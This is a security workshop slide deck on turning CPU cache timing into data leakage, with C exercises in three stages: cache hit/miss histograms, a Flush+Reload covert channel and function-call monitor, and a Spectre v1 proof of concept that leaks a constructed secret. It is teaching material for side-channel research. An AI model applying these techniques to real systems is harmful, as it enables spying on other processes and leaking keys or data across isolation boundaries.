

# **Turning Timing Differences into Data Leakage**

Daniel Weber, Michael Schwarz. December 6, 2022.

CISPA Helmholtz Center for Information Security

Mic-Sec 22: Turning Timing Differences into Data Leakage

## **Agenda**

1. Observe Optimizations
2. Stealthy Communication
3. Leaking Inaccessible Data

## **Exercise Requirements**

Hardware/Software Requirements:

- x86 CPU
- Linux installation
- Installed tools: python3, gcc, make
- Installed Python package: matplotlib

## **CPU Optimizations**

- Modern CPUs contain multiple microarchitectural elements (caches, prefetchers, branch predictors, ...)
- Transparent for the programmer: they never change the architectural result of a program, only how fast it is computed
- **Optimize** for performance, power consumption, ...

Does that really work? Can we **observe** these effects?

## **Experiment Idea**

1. Time cache hits
2. Time cache misses
3. Plot the timings

## **What Building Blocks do we need?**

- **BB 1**: Bring memory **into** the cache
- **BB 2**: Remove memory **from** the cache
- **BB 3**: High-precision time measurements

How do we bring memory into the cache?

## **BB 1: Bring Memory into the Cache**

Easy! Just access it. Any load (or store) brings the 64-byte cache line that contains the address into the cache hierarchy; the next access to that line is a cache hit.

How do we remove memory from the cache?

## **BB 2: Remove Memory from the Cache**

- Caches are limited in size
  - $\rightarrow$ Access many other addresses that map to the same cache set (an eviction set)
  - $\rightarrow$ Original entry will be evicted
- Special cache-maintenance instructions
  - $\rightarrow$ `CLFLUSH [rax]` and `CLFLUSHOPT [rax]` write back and invalidate the cache line containing the address in `rax` from every cache level
  - $\rightarrow$ Both are unprivileged, so they work from user space (`_mm_clflush()` in gcc's `x86intrin.h`)

How do we get high-precision time measurements?

## **BB 3: High-Precision Time Measurements**

- x86 has two instructions: `rdtsc` and `rdtscp`
- Both read the processor's time-stamp counter (TSC)
  - $\rightarrow$ nominally CPU cycles since reset; on current CPUs the TSC increments at a constant rate independent of the actual core frequency (invariant TSC), so it is a clock, not a cycle counter
- Highly accurate (cycle granularity, i.e. nanoseconds and below), low overhead
- Unprivileged by default, so no special permissions are needed

## **Timings can be Reordered**

What about out-of-order execution?

**Out-of-order execution** $\rightarrow$ the CPU may execute `rdtsc` before or after the memory access we want to time, so a naive `rdtsc; load; rdtsc` sequence does not necessarily bracket the access. Different possibilities to enforce the order:

- **Pseudo-serializing** instruction `rdtscp` (recent CPUs): waits until all previous instructions have executed, but later instructions may still start before it
- Serializing instructions like `cpuid`: nothing after them starts before they complete (expensive, and `cpuid` causes a VM exit inside virtual machines)
- Fences like `mfence` (and `lfence`): keep memory operations from moving across the timer reads

Intel, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures White Paper, December 2010.

## **BB 3: High-Precision Time Measurements (Accurate)**

The pattern from the Intel white paper: `cpuid; rdtsc` before the code under test, `rdtscp; cpuid` after it. A fence-based variant (`mfence; lfence; rdtsc; lfence` before, `rdtscp; lfence` after) avoids the cost of `cpuid` and is what the exercises use.

## We got **all building blocks!** Let's get our hands dirty!

## **Exercise 1: Observing CPU Caches**

The Task:

Build a histogram for cache hits and misses.

Hints for better results:

- Connect your laptop to power (frequency scaling and power-saving states on battery add noise to the timings)
- Close unrelated programs (they compete for the cache and the cores)

# Exercise 1: Observing CPU Caches

(https://challenge.attacking.systems/cpu-caches.tar.gz)
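The three building blocks and the histogram of Exercise 1 in one file, as an added example (not the exercise's own code): `maccess` is BB 1, `flush` is BB 2 with `CLFLUSH`, and `rdtsc_begin`/`rdtsc_end` are BB 3 with the fence-based variant of the Intel white paper's pattern. The bin width of 10 ticks and 40 bins are assumptions that fit typical hit (tens of ticks) and miss (hundreds of ticks) timings; the non-x86 fallback only keeps the file compiling and will not separate hits from misses.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* BB 1: a load brings the cache line into the cache. */
static inline void maccess(const void *p) { (void)*(volatile const char *)p; }
/* BB 2: CLFLUSH evicts the line from all cache levels; mfence waits for it. */
static inline void flush(const void *p) { _mm_clflush(p); _mm_mfence(); }
/* BB 3: timer reads bracketed by fences so the load cannot be reordered
 * across them (fence-based variant of the Intel white paper's cpuid/rdtscp). */
static inline uint64_t rdtsc_begin(void) {
    _mm_mfence(); _mm_lfence();
    uint64_t t = __rdtsc();
    _mm_lfence();
    return t;
}
static inline uint64_t rdtsc_end(void) {
    unsigned aux;
    uint64_t t = __rdtscp(&aux);   /* waits for all earlier instructions, i.e. the load */
    _mm_lfence();
    return t;
}
#else
/* Non-x86 fallback so the file still compiles: no flush and a coarse clock,
 * so hits and misses will NOT separate here. */
#include <time.h>
static inline void maccess(const void *p) { (void)*(volatile const char *)p; }
static inline void flush(const void *p) { (void)p; }
static inline uint64_t rdtsc_begin(void) {
    struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
static inline uint64_t rdtsc_end(void) { return rdtsc_begin(); }
#endif

/* Time a single access to p, in TSC ticks. */
static inline uint64_t timed_access(const void *p) {
    uint64_t start = rdtsc_begin();
    maccess(p);
    return rdtsc_end() - start;
}

/* n timings of target: cache hit (access first) or miss (flush first). */
static void measure(char *target, int flush_first, size_t n, uint64_t *out) {
    for (size_t i = 0; i < n; i++) {
        if (flush_first) flush(target); else maccess(target);
        out[i] = timed_access(target);
    }
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n samples; robust against the occasional interrupt or context switch. */
uint64_t median(const uint64_t *v, size_t n) {
    uint64_t *c = malloc(n * sizeof *c);
    memcpy(c, v, n * sizeof *c);
    qsort(c, n, sizeof *c, cmp_u64);
    uint64_t m = c[n / 2];
    free(c);
    return m;
}

/* Bin the timings (bin_width ticks per bin; the last bin collects everything
 * above the range). Returns the index of the fullest bin. */
size_t histogram(const uint64_t *t, size_t n, unsigned *bins, size_t nbins, uint64_t bin_width) {
    memset(bins, 0, nbins * sizeof *bins);
    for (size_t i = 0; i < n; i++) {
        size_t b = (size_t)(t[i] / bin_width);
        bins[b < nbins ? b : nbins - 1]++;
    }
    size_t best = 0;
    for (size_t b = 1; b < nbins; b++) if (bins[b] > bins[best]) best = b;
    return best;
}

/* A hit/miss threshold for the later exercises: halfway between the two medians. */
uint64_t threshold(uint64_t hit_median, uint64_t miss_median) {
    return (hit_median + miss_median) / 2;
}

int main(void) {
    enum { N = 10000, NBINS = 40, WIDTH = 10 };
    static char target[64] __attribute__((aligned(64)));
    static uint64_t hits[N], misses[N];
    static unsigned hb[NBINS], mb[NBINS];
    measure(target, 0, N, hits);
    measure(target, 1, N, misses);
    histogram(hits, N, hb, NBINS, WIDTH);
    histogram(misses, N, mb, NBINS, WIDTH);
    printf("ticks   hits misses\n");
    for (size_t b = 0; b < NBINS; b++) printf("%5zu %6u %6u\n", b * WIDTH, hb[b], mb[b]);
    uint64_t hm = median(hits, N), mm = median(misses, N);
    printf("median hit %llu, median miss %llu, threshold %llu\n",
           (unsigned long long)hm, (unsigned long long)mm, (unsigned long long)threshold(hm, mm));
    return 0;
}
```

Compile with `gcc -O2 -o cache_hist cache_hist.c` and run it on an idle machine; the two columns should show two well-separated peaks, and the printed threshold is the number to reuse when classifying single accesses in the following exercises.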

## **Mission Accomplished: Observing CPU Caches**

Cache hits and misses are distinguishable by timing alone: the hit timings cluster at a low tick count, the miss timings at a much higher one.

Can we do something with that?

## **Beware of Prefetchers**

- CPUs optimize recognizable access patterns
- Pattern detected $\rightarrow$ **prefetch next** addresses

```
for (size_t i = 0; i < 10; i++) {
    // CPU will prefetch arr[i+1] -> Cache hits
    sum += arr[i];
}
```

- $\rightarrow$ A prefetched line looks like a cache hit although nobody accessed it, which corrupts every measurement that depends on "was this line accessed?"
- $\rightarrow$ **Permute** your accesses, so that no stride is recognizable!
- $\rightarrow$ Shift indices by 4096 B: put every probed element on its own page, because the hardware prefetchers do not follow a pattern across a page boundary



Let's try this out!


## **Exercise 2: Covert Communication**

The Task:

Build a covert communication channel using the CPU cache.

Hints for better results:

- Connect your laptop to power
- Close unrelated programs
- Use the permutate\_index function to prevent prefetch effects

# Exercise 2: **Stealthy Communication**

(https://challenge.attacking.systems/covert.tar.gz)
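A complete two-process cache covert channel, as an added example that is not the exercise's solution: it serves both the prefetcher caveat above (the eight probe lines are 4096 B apart and are reloaded in a permuted order) and Exercise 2. The sender (a forked child) encodes one byte per time slot by repeatedly accessing the line of every 1-bit; the receiver flushes all eight lines, waits, reloads them and takes a majority vote over many probes. Assumptions: `fill_permutation` is my stand-in for the exercise's `permutate_index`, whose definition is not on the slides; the hit threshold of 150 ticks and the 20 ms slot are guesses to be calibrated with Exercise 1; the only information the two processes share apart from the cache is the slot start time, handed over before the fork.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void maccess(const void *p) { (void)*(volatile const char *)p; }
static inline void flush(const void *p) { _mm_clflush(p); _mm_mfence(); }
static inline uint64_t timed_access(const void *p) {
    unsigned aux;
    _mm_mfence(); _mm_lfence();
    uint64_t t0 = __rdtsc();
    _mm_lfence();
    maccess(p);
    uint64_t t1 = __rdtscp(&aux);
    _mm_lfence();
    return t1 - t0;
}
#else
/* Non-x86 fallback so the file compiles; without CLFLUSH there is no channel. */
static inline void maccess(const void *p) { (void)*(volatile const char *)p; }
static inline void flush(const void *p) { (void)p; }
static inline uint64_t timed_access(const void *p) { maccess(p); return 0; }
#endif
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20   /* Linux value, in case strict feature macros hide it */
#endif

enum { BITS = 8, PAGE = 4096, THRESHOLD = 150 };   /* THRESHOLD assumed: calibrate with Exercise 1 */

/* Deterministic Fisher-Yates shuffle of 0..n-1 (assumed stand-in for permutate_index). */
void fill_permutation(size_t *perm, size_t n, uint32_t seed) {
    for (size_t i = 0; i < n; i++) perm[i] = i;
    for (size_t i = n - 1; i > 0; i--) {
        seed = seed * 1103515245u + 12345u;              /* LCG step */
        size_t j = (seed >> 8) % (i + 1);
        size_t t = perm[i]; perm[i] = perm[j]; perm[j] = t;
    }
}

/* True if perm contains every index 0..n-1 exactly once (n <= 256). */
int is_permutation(const size_t *perm, size_t n) {
    unsigned char seen[256] = {0};
    if (n > 256) return 0;
    for (size_t i = 0; i < n; i++) { if (perm[i] >= n || seen[perm[i]]) return 0; seen[perm[i]] = 1; }
    return 1;
}

/* Majority vote: bit b is 1 if more than half of the probes of line b were hits. */
unsigned decode_byte(const unsigned *hits, unsigned samples) {
    unsigned byte = 0;
    for (unsigned b = 0; b < BITS; b++) if (hits[b] * 2 > samples) byte |= 1u << b;
    return byte;
}

static uint64_t now_ns(void) {
    struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
static void spin_until(uint64_t t) { while (now_ns() < t) ; }

/* Sender: during byte i's slot, keep accessing the line of every 1-bit (a 0-bit's line stays cold). */
static void sender(char *buf, const char *msg, size_t len, uint64_t start, uint64_t slot) {
    for (size_t i = 0; i < len; i++) {
        spin_until(start + i * slot);
        while (now_ns() < start + (i + 1) * slot)
            for (unsigned b = 0; b < BITS; b++)
                if (((unsigned char)msg[i] >> b) & 1) maccess(buf + b * PAGE);
    }
}

/* Receiver: Flush+Reload all eight lines repeatedly inside the slot, in permuted order. */
static void receiver(char *buf, char *out, size_t len, uint64_t start, uint64_t slot) {
    size_t perm[BITS];
    fill_permutation(perm, BITS, 42);
    for (size_t i = 0; i < len; i++) {
        unsigned hits[BITS] = {0}, samples = 0;
        spin_until(start + i * slot + slot / 10);           /* stay clear of the slot edges */
        while (now_ns() < start + (i + 1) * slot - slot / 10) {
            for (unsigned b = 0; b < BITS; b++) flush(buf + b * PAGE);
            spin_until(now_ns() + 5000);                      /* 5 us for the sender to act */
            for (unsigned k = 0; k < BITS; k++)
                if (timed_access(buf + perm[k] * PAGE) < THRESHOLD) hits[perm[k]]++;
            samples++;
        }
        out[i] = (char)decode_byte(hits, samples);
    }
}

int main(void) {
    const char *msg = "hi";
    size_t len = strlen(msg);
    char *buf = mmap(NULL, BITS * PAGE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); return 1; }
    memset(buf, 1, BITS * PAGE);               /* back every page with real memory before forking */
    uint64_t slot = 20000000ull;                /* 20 ms per byte */
    uint64_t start = now_ns() + 100000000ull;   /* agreed start time, fixed before the fork */
    pid_t pid = fork();
    if (pid == 0) { sender(buf, msg, len, start, slot); _exit(0); }
    char out[64] = {0};
    receiver(buf, out, len, start, slot);
    waitpid(pid, NULL, 0);
    printf("sent \"%s\", received \"%s\"\n", msg, out);
    return 0;
}
```

The shared anonymous mapping stands in for the shared library or deduplicated page that two unrelated processes would use; nothing in the kernel's view of the two processes shows a communication channel, only two processes reading memory. If bits come out wrong, raise the slot length first and recheck the threshold.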

## **Mission Accomplished: Covert Communication via the CPU Cache**

- Encoding data in the CPU cache (e.g., access a shared line for a 1, leave it flushed for a 0)
- Decoding from another process (time the reload of that line)
- $\rightarrow$ Stealthy Communication between 2 processes, without any communication channel the OS can see

What happens if the sending party is a benign process?

Step 1: Attacker maps shared library (shared memory, in cache)

Step 2: Attacker flushes the shared cache line

Step 3: Victim loads the data

Step 4: Attacker measures the access time to reload the data

$\rightarrow$ A fast reload means the victim touched the line between step 2 and step 4 (Flush+Reload). The line must be physically shared, which is exactly what mapping the same library (or deduplicated page) gives the attacker; the victim needs no modification and cannot tell that it is being observed.
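The four steps against a benign victim, as an added example (not from the slides): the victim is a forked child that calls `sensitive_op()` in three bursts, and the attacker probes the first cache line of that function's code with Flush+Reload every 50 µs. The fork stands in for step 1: parent and child map the same executable, so the code pages are shared just like a shared library's. Assumed: the 150-tick threshold, the burst timing, and that `sensitive_op` plays the role of the monitored library function.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void flush(const void *p) { _mm_clflush(p); _mm_mfence(); }
static inline uint64_t timed_access(const void *p) {
    unsigned aux;
    _mm_mfence(); _mm_lfence();
    uint64_t t0 = __rdtsc();
    _mm_lfence();
    (void)*(volatile const char *)p;
    uint64_t t1 = __rdtscp(&aux);
    _mm_lfence();
    return t1 - t0;
}
#else
/* Non-x86 fallback so the file compiles; there is no real flush here. */
static inline void flush(const void *p) { (void)p; }
static inline uint64_t timed_access(const void *p) { (void)*(volatile const char *)p; return 0; }
#endif

enum { THRESHOLD = 150, SAMPLES = 2000, SAMPLE_NS = 50000 };   /* THRESHOLD assumed */

static volatile unsigned counter;
/* The function whose calls we want to observe; noinline keeps it at one
 * fixed, flushable address (like a function in a shared library). */
__attribute__((noinline)) void sensitive_op(void) { counter++; }

static uint64_t now_ns(void) {
    struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
static void spin_until(uint64_t t) { while (now_ns() < t) ; }

/* Victim: bursts of calls separated by quiet gaps (step 3 happens here). */
static void victim(unsigned bursts) {
    for (unsigned b = 0; b < bursts; b++) {
        uint64_t end = now_ns() + 10000000ull;      /* 10 ms active */
        while (now_ns() < end) sensitive_op();
        spin_until(now_ns() + 20000000ull);          /* 20 ms quiet */
    }
}

/* Attacker: one Flush+Reload probe every SAMPLE_NS; trace[i] = 1 means the
 * line was back in the cache, i.e. the victim executed sensitive_op meanwhile. */
static void attacker(const void *line, uint8_t *trace, size_t n) {
    uint64_t next = now_ns();
    for (size_t i = 0; i < n; i++) {
        flush(line);                                 /* step 2 */
        next += SAMPLE_NS;
        spin_until(next);                            /* window in which the victim may run */
        trace[i] = timed_access(line) < THRESHOLD;   /* step 4 */
    }
}

/* One character per `bucket` samples: '#' if any probe in it hit, '.' otherwise. */
size_t summarize(const uint8_t *trace, size_t n, size_t bucket, char *out, size_t outsz) {
    size_t w = 0;
    for (size_t i = 0; i < n && w + 1 < outsz; i += bucket) {
        unsigned hit = 0;
        for (size_t j = i; j < i + bucket && j < n; j++) hit |= trace[j];
        out[w++] = hit ? '#' : '.';
    }
    out[w] = '\0';
    return w;
}

unsigned count_hits(const uint8_t *trace, size_t n) {
    unsigned c = 0;
    for (size_t i = 0; i < n; i++) c += trace[i];
    return c;
}

int main(void) {
    static uint8_t trace[SAMPLES];
    char timeline[128];
    pid_t pid = fork();                              /* step 1: the child shares our code pages */
    if (pid == 0) { spin_until(now_ns() + 10000000ull); victim(3); _exit(0); }
    attacker((const void *)sensitive_op, trace, SAMPLES);
    waitpid(pid, NULL, 0);
    summarize(trace, SAMPLES, 20, timeline, sizeof timeline);
    printf("%u of %u probes hit; 1 ms per char: %s\n", count_hits(trace, SAMPLES), SAMPLES, timeline);
    return 0;
}
```

On an x86 machine the timeline shows three blocks of `#` separated by gaps of `.`, i.e. the attacker sees when the victim called the function without any cooperation from it. Replacing `sensitive_op` by the address of a function inside a mapped library (for example obtained with `dlsym`) turns this into the "monitor function calls of other applications" case from the next slide.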

With Flush+Reload we can:

- Build covert communication channels
- Monitor function calls of other applications
- Leak cryptographic keys
- Leak information from **co-located virtual machines**
- . . .

Can we leak something else than meta data? Perhaps **real data?**

Consider a branch whose condition depends on a value that is currently not in the cache:

```
x = 42
x_ptr = &x
flush(x_ptr)
if x > *min_ptr
```

The load of `x` is slow because `x` was just flushed. Instead of waiting, the CPU predicts the outcome of `if x > *min_ptr` and continues executing the predicted path. When the load finally completes and the prediction turns out to be wrong, these transiently executed instructions are discarded and all their architectural effects are rolled back.

Maybe transient execution leaves traces in the microarchitecture?

Yes: a load executed on the transient path still brings its cache line into the cache, and the cache is not rolled back. If the transient path accesses an address that depends on a value the program is not allowed to read, the cache line that turned into a hit reveals that value.

Let's leak some data!

## **Exercise 3: When Predictions go Wrong**

The Task:

Leak the secret password by exploiting the victim API.

Hints for better results:

- Connect your laptop to power
- Close unrelated programs
- Use the permutate\_index function to prevent prefetch effects
- Be patient! Mistraining and transient leakage are probabilistic, so repeat each measurement many times and take the most frequent result

# Exercise 3: **When Predictions go Wrong**

(https://challenge.attacking.systems/spectre.tar.gz)
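The shape of Exercise 3 in one file, as an added example with its own constructed victim rather than the exercise's API: `victim()` performs a correct bounds check before reading `array1[idx]` and touching one of 256 probe pages, the attacker calls it in-bounds five times to train the branch predictor, then once with an index that reaches the secret while the bounds value is flushed from the cache, and finally Flush+Reloads the probe pages (in a permuted order, one page each, to defeat the prefetcher). The secret `"Hunter2"`, the 150-tick threshold, 100 rounds and the training pattern are all assumptions; the branch-free index selection follows the construction of the public Spectre v1 proof of concept.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void flush(const void *p) { _mm_clflush(p); _mm_mfence(); }
static inline uint64_t timed_access(const void *p) {
    unsigned aux;
    _mm_mfence(); _mm_lfence();
    uint64_t t0 = __rdtsc();
    _mm_lfence();
    (void)*(volatile const char *)p;
    uint64_t t1 = __rdtscp(&aux);
    _mm_lfence();
    return t1 - t0;
}
#else
/* Non-x86 fallback so the file compiles; the transient leak needs real x86. */
static inline void flush(const void *p) { (void)p; }
static inline uint64_t timed_access(const void *p) { (void)*(volatile const char *)p; return 0; }
#endif

enum { PAGE = 4096, THRESHOLD = 150, ROUNDS = 100 };   /* THRESHOLD assumed: calibrate per CPU */

/* ---- victim side (constructed for this example) ---- */
static const char secret[] = "Hunter2";           /* constructed secret, never returned by the API */
static volatile size_t array1_size = 16;          /* lives in memory, so the attacker can flush it */
static uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
static uint8_t probe[256 * PAGE];                 /* one page per possible byte value */
static volatile uint8_t sink;

/* The "victim API": architecturally it only ever reads array1 in bounds.
 * Transiently, after a mispredicted bounds check, it reads array1[idx] for
 * any idx and encodes that byte as the index of the probe page it touches. */
int victim(size_t idx) {
    if (idx < array1_size) {
        sink = probe[array1[idx] * PAGE];
        return 1;
    }
    return 0;
}

/* ---- attacker side ---- */
/* Branch-free choice of the next call's index: `offset` (out of bounds) on
 * every sixth call, the in-bounds `train` otherwise. No branch, so the
 * attacker does not disturb the predictor it is mistraining. */
size_t select_index(int j, size_t train, size_t offset) {
    size_t x = (size_t)((j % 6) - 1) & ~(size_t)0xFFFF;   /* all ones iff j % 6 == 0 ... */
    x = x | (x >> 16);                                     /* ... otherwise zero */
    return train ^ (x & (offset ^ train));
}

unsigned best_guess(const unsigned *score) {
    unsigned best = 0;
    for (unsigned i = 1; i < 256; i++) if (score[i] > score[best]) best = i;
    return best;
}

/* Recover the byte at array1 + offset: mistrain, call out of bounds, Flush+Reload. */
unsigned leak_byte(size_t offset, unsigned *score) {
    memset(probe, 1, sizeof probe);     /* real pages, not the shared zero page */
    memset(score, 0, 256 * sizeof *score);
    for (int r = 0; r < ROUNDS; r++) {
        size_t train = (size_t)r & 15;
        for (int i = 0; i < 256; i++) flush(probe + i * PAGE);      /* Flush */
        for (int j = 30; j >= 0; j--) {
            flush((const void *)&array1_size);                      /* slow bounds check: long transient window */
            for (volatile int z = 0; z < 100; z++) ;                /* let the flush take effect */
            victim(select_index(j, train, offset));
        }
        for (int k = 0; k < 256; k++) {                             /* Reload, in permuted order */
            size_t i = (size_t)(k * 167 + 13) & 255;
            if (timed_access(probe + i * PAGE) < THRESHOLD && i != array1[train]) score[i]++;
        }
    }
    return best_guess(score);
}

int main(void) {
    static unsigned score[256];
    /* Wraps around, so array1[offset] aliases secret[0] transiently. */
    size_t offset = (size_t)((uintptr_t)secret - (uintptr_t)array1);
    printf("leaked: ");
    for (size_t i = 0; i + 1 < sizeof secret; i++) {
        unsigned c = leak_byte(offset + i, score);
        printf("%c", (c >= 32 && c < 127) ? (char)c : '?');
    }
    printf("   (actual: %s)\n", secret);
    return 0;
}
```

Compile with `gcc -O1` (aggressive optimization can restructure the victim's branch) and run on an idle machine; on most x86 CPUs the leaked string matches the secret after a few tries, while on CPUs or victims with a speculation barrier (`lfence` after the bounds check) the scores stay flat. The `i != array1[train]` filter drops the page the training calls legitimately load.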

## **Mission Accomplished: Leaking actual data**

- Branch predictor mistrained
- Data encoded in CPU cache
- $\rightarrow$ Inaccessible data leaked through transient execution

## **Recap**

1. **Observe Optimizations**: cache hits and misses are distinguishable by timing alone
2. **Leak Access Patterns (Meta Data)**: covert channels between processes and Flush+Reload on a benign victim
3. **Leaking Inaccessible Data**: a mistrained branch plus transient execution encodes secrets in the cache

CPU optimizations can lead to severe data leakage!

Mic-Sec 22: Daniel Weber (@weber\_daniel), Michael Schwarz (@misc0110)


#### References





- Icons and Images from storyset.com and thenounproject.com
- Some Animations from Moritz Lipp